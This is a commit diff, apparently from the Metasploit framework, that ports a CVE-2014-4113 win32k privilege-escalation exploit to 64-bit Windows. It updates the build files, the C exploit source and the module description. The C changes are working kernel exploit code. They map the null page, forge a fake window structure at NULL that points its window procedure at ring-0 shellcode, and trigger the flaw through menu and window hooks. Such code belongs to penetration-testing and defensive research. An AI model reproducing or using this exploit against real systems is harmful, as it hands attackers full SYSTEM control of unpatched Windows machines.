Land jvazquez-r7#22, @zeroSteiner 64 bits version
This commit is contained in:
commit
f24129933f
Binary file not shown.
Binary file not shown.
|
@ -1,18 +1,26 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 2010
|
# Visual Studio Express 2013 for Windows Desktop
|
||||||
|
VisualStudioVersion = 12.0.30723.0
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
Debug|Win32 = Debug|Win32
|
Debug|Win32 = Debug|Win32
|
||||||
|
Debug|x64 = Debug|x64
|
||||||
Release|Win32 = Release|Win32
|
Release|Win32 = Release|Win32
|
||||||
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
HideSolutionNode = FALSE
|
HideSolutionNode = FALSE
|
||||||
|
|
|
@ -16,9 +16,13 @@ typedef NTSTATUS *PNTSTATUS;
|
||||||
|
|
||||||
#define DEBUGGING FALSE
|
#define DEBUGGING FALSE
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
typedef unsigned __int64 QWORD;
|
||||||
|
typedef QWORD *PQWORD;
|
||||||
|
#endif
|
||||||
|
|
||||||
int WndProcClue = 0;
|
int WndProcClue = 0;
|
||||||
int HookCallbackClue = 0;
|
int HookCallbackClue = 0;
|
||||||
int HookCallbackThreeClue = 0;
|
|
||||||
WNDPROC lpPrevWndFunc;
|
WNDPROC lpPrevWndFunc;
|
||||||
DWORD MyProcessId = 0;
|
DWORD MyProcessId = 0;
|
||||||
DWORD OffsetWindows = 0;
|
DWORD OffsetWindows = 0;
|
||||||
|
@ -45,15 +49,15 @@ typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
||||||
);
|
);
|
||||||
|
|
||||||
typedef struct _SYSTEM_MODULE {
|
typedef struct _SYSTEM_MODULE {
|
||||||
ULONG Reserved1;
|
HANDLE Reserved1;
|
||||||
ULONG Reserved2;
|
PVOID Reserved2;
|
||||||
PVOID ImageBaseAddress;
|
PVOID ImageBaseAddress;
|
||||||
ULONG ImageSize;
|
ULONG ImageSize;
|
||||||
ULONG Flags;
|
ULONG Flags;
|
||||||
WORD Id;
|
USHORT Id;
|
||||||
WORD Rank;
|
USHORT Rank;
|
||||||
WORD w018;
|
USHORT w018;
|
||||||
WORD NameOffset;
|
USHORT NameOffset;
|
||||||
BYTE Name[256];
|
BYTE Name[256];
|
||||||
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
} SYSTEM_MODULE, *PSYSTEM_MODULE;
|
||||||
|
|
||||||
|
@ -66,48 +70,28 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
|
||||||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||||
|
|
||||||
LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
|
|
||||||
|
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||||
{
|
{
|
||||||
if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
|
EndMenu();
|
||||||
HookCallbackThreeClue = 1;
|
return -5;
|
||||||
return CallNextHookEx(0, code, wParam, lParam);
|
|
||||||
}
|
}
|
||||||
|
|
||||||
LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
||||||
{
|
#ifdef _M_X64
|
||||||
LRESULT result;
|
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
|
||||||
DWORD v5;
|
#else
|
||||||
|
|
||||||
if (Msg == 0x1EB)
|
|
||||||
{
|
|
||||||
v5 = GetCurrentThreadId();
|
|
||||||
SetWindowsHookExA(9, HookCallbackThree, 0, v5);
|
|
||||||
SendMessageA(hWnd, 0, 0x900516u, 0);
|
|
||||||
UnhookWindowsHook(9, HookCallbackThree);
|
|
||||||
if (HookCallbackThreeClue)
|
|
||||||
{
|
|
||||||
EndMenu();
|
|
||||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
EndMenu();
|
|
||||||
result = -5;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
|
|
||||||
}
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
|
|
||||||
LRESULT __stdcall HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
|
||||||
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
|
||||||
|
#endif
|
||||||
{
|
{
|
||||||
HookCallbackClue = 1;
|
HookCallbackClue = 1;
|
||||||
if (UnhookWindowsHook(4, HookCallback))
|
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
||||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), -4, (LONG)HookCallbackTwo);
|
#ifdef _M_X64
|
||||||
|
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||||
|
#else
|
||||||
|
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
}
|
}
|
||||||
return CallNextHookEx(0, code, wParam, lParam);
|
return CallNextHookEx(0, code, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
@ -122,13 +106,21 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
||||||
return DefWindowProc(hwnd, msg, wParam, lParam);
|
return DefWindowProc(hwnd, msg, wParam, lParam);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
QWORD MyPtiCurrent(void) {
|
||||||
|
void *teb = (void *)__readgsqword(0x30);
|
||||||
|
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
||||||
|
|
||||||
|
return Win32ThreadInfo;
|
||||||
|
}
|
||||||
|
#else
|
||||||
DWORD __stdcall MyPtiCurrent() {
|
DWORD __stdcall MyPtiCurrent() {
|
||||||
__asm {
|
__asm {
|
||||||
mov eax, fs : 18h
|
mov eax, fs : 18h
|
||||||
mov eax, [eax + 40h]
|
mov eax, [eax + 40h]
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
#endif
|
||||||
|
|
||||||
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
|
||||||
void *my_process_info = NULL;
|
void *my_process_info = NULL;
|
||||||
|
@ -151,6 +143,7 @@ LogMessage(char* pszFormat, ...) {
|
||||||
va_list args;
|
va_list args;
|
||||||
va_start(args, pszFormat);
|
va_start(args, pszFormat);
|
||||||
vsprintf(s_acBuf, pszFormat, args);
|
vsprintf(s_acBuf, pszFormat, args);
|
||||||
|
printf("%s\n", s_acBuf);
|
||||||
OutputDebugString(s_acBuf);
|
OutputDebugString(s_acBuf);
|
||||||
va_end(args);
|
va_end(args);
|
||||||
}
|
}
|
||||||
|
@ -184,6 +177,12 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||||
|
LogMessage("[*] Windows 6.1 found...");
|
||||||
|
OffsetWindows = 0x208;
|
||||||
|
}
|
||||||
|
#else
|
||||||
if (VersionInformation.dwMajorVersion == 6) {
|
if (VersionInformation.dwMajorVersion == 6) {
|
||||||
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
|
||||||
LogMessage("[*] Windows 6.1 found...");
|
LogMessage("[*] Windows 6.1 found...");
|
||||||
|
@ -212,6 +211,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
#endif
|
||||||
else {
|
else {
|
||||||
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
|
||||||
return;
|
return;
|
||||||
|
@ -306,9 +306,13 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
|
||||||
|
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
|
||||||
|
#else
|
||||||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
|
||||||
|
|
||||||
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
|
||||||
|
#endif
|
||||||
|
|
||||||
MyProcessId = GetCurrentProcessId();
|
MyProcessId = GetCurrentProcessId();
|
||||||
|
|
||||||
|
@ -336,7 +340,11 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
// Making everything ready for exploitation...
|
// Making everything ready for exploitation...
|
||||||
|
|
||||||
LogMessage("[*] Allocating null page...");
|
LogMessage("[*] Allocating null page...");
|
||||||
|
#ifdef _M_X64
|
||||||
|
ULONGLONG base_address = 0x00000000fffffffb;
|
||||||
|
#else
|
||||||
DWORD base_address = 1;
|
DWORD base_address = 1;
|
||||||
|
#endif
|
||||||
SIZE_T region_size = 0x1000;
|
SIZE_T region_size = 0x1000;
|
||||||
ULONG zero_bits = 0;
|
ULONG zero_bits = 0;
|
||||||
HANDLE current_process = NULL;
|
HANDLE current_process = NULL;
|
||||||
|
@ -350,7 +358,11 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
|
|
||||||
LogMessage("[*] Getting PtiCurrent...");
|
LogMessage("[*] Getting PtiCurrent...");
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
ULONGLONG pti = MyPtiCurrent();
|
||||||
|
#else
|
||||||
DWORD pti = MyPtiCurrent();
|
DWORD pti = MyPtiCurrent();
|
||||||
|
#endif
|
||||||
|
|
||||||
if (pti == 0) {
|
if (pti == 0) {
|
||||||
LoadLibrary("user32.dll");
|
LoadLibrary("user32.dll");
|
||||||
|
@ -363,11 +375,28 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
|
#ifdef _M_X64
|
||||||
|
LogMessage("[*] Good! pti 0x%016llx", pti);
|
||||||
|
#else
|
||||||
LogMessage("[*] Good! pti 0x%08x", pti);
|
LogMessage("[*] Good! pti 0x%08x", pti);
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
LogMessage("[*] Creating a fake structure at NULL...");
|
LogMessage("[*] Creating a fake structure at NULL...");
|
||||||
|
|
||||||
|
#ifdef _M_X64
|
||||||
|
void *test = NULL;
|
||||||
|
(QWORD)test = 0x10000000B;
|
||||||
|
*((PQWORD)test) = pti;
|
||||||
|
|
||||||
|
/* win32k!tagWND->bServerSideWindowProc = TRUE */
|
||||||
|
(QWORD)test = 0x100000025;
|
||||||
|
*((PBYTE)test) = 4;
|
||||||
|
|
||||||
|
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
|
||||||
|
(QWORD)test = 0x10000008B;
|
||||||
|
*((PQWORD)test) = &shellcode_ring0;
|
||||||
|
#else
|
||||||
void *test = promise_land + 3;
|
void *test = promise_land + 3;
|
||||||
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
|
||||||
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
.text:BF8B93F4 02C mov edi, _gptiCurrent
|
||||||
|
@ -380,7 +409,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
|
|
||||||
test = promise_land + 0x5b;
|
test = promise_land + 0x5b;
|
||||||
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
*(LPDWORD)test = (DWORD)shellcode_ring0;
|
||||||
|
#endif
|
||||||
|
|
||||||
// Exploit!
|
// Exploit!
|
||||||
|
|
||||||
|
@ -394,7 +423,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
MENUITEMINFOA MenuOneInfo;
|
MENUITEMINFOA MenuOneInfo;
|
||||||
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuOneInfo.fMask = 64;
|
MenuOneInfo.fMask = MIIM_STRING;
|
||||||
|
|
||||||
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
|
||||||
LogMessage("[!] First InsertMenuItemA failed");
|
LogMessage("[!] First InsertMenuItemA failed");
|
||||||
|
@ -412,7 +441,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
MENUITEMINFOA MenuTwoInfo;
|
MENUITEMINFOA MenuTwoInfo;
|
||||||
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
|
||||||
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
|
||||||
MenuTwoInfo.fMask = 68;
|
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
|
||||||
MenuTwoInfo.dwTypeData = "";
|
MenuTwoInfo.dwTypeData = "";
|
||||||
MenuTwoInfo.cch = 1;
|
MenuTwoInfo.cch = 1;
|
||||||
MenuTwoInfo.hSubMenu = MenuOne;
|
MenuTwoInfo.hSubMenu = MenuOne;
|
||||||
|
@ -423,8 +452,7 @@ void Win32kNullPage(LPVOID lpPayload) {
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
DWORD thread_id = GetCurrentThreadId();
|
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
|
||||||
if (SetWindowsHookExA(4, HookCallback, NULL, thread_id) == NULL) {
|
|
||||||
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
LogMessage("[!] SetWindowsHookExA failed :-(\n");
|
||||||
DestroyMenu(MenuTwo);
|
DestroyMenu(MenuTwo);
|
||||||
DestroyMenu(MenuOne);
|
DestroyMenu(MenuOne);
|
||||||
|
|
|
@ -5,10 +5,18 @@
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
<Platform>Win32</Platform>
|
<Platform>Win32</Platform>
|
||||||
</ProjectConfiguration>
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
<ProjectConfiguration Include="Release|Win32">
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
<Configuration>Release</Configuration>
|
<Configuration>Release</Configuration>
|
||||||
<Platform>Win32</Platform>
|
<Platform>Win32</Platform>
|
||||||
</ProjectConfiguration>
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<PropertyGroup Label="Globals">
|
<PropertyGroup Label="Globals">
|
||||||
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
|
||||||
|
@ -22,6 +30,13 @@
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
@ -29,22 +44,41 @@
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<PlatformToolset>v120</PlatformToolset>
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
|
||||||
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
@ -60,6 +94,21 @@
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<CompileAs>CompileAsC</CompileAs>
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
@ -76,10 +125,26 @@
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<CompileAs>Default</CompileAs>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClCompile Include="cve-2014-4113.c" />
|
<ClCompile Include="cve-2014-4113.c" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
</Project>
|
</Project>
|
|
@ -24,15 +24,17 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
can be triggered through the use of TrackPopupMenu. Under special conditions, the
|
||||||
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
|
||||||
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
code execution. This module has been tested successfully on Windows XP SP3, Windows
|
||||||
2003 SP2, Windows 7 SP1 and Windows 2008 32bits.
|
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
|
||||||
|
2008 R2 SP1 64 bits.
|
||||||
},
|
},
|
||||||
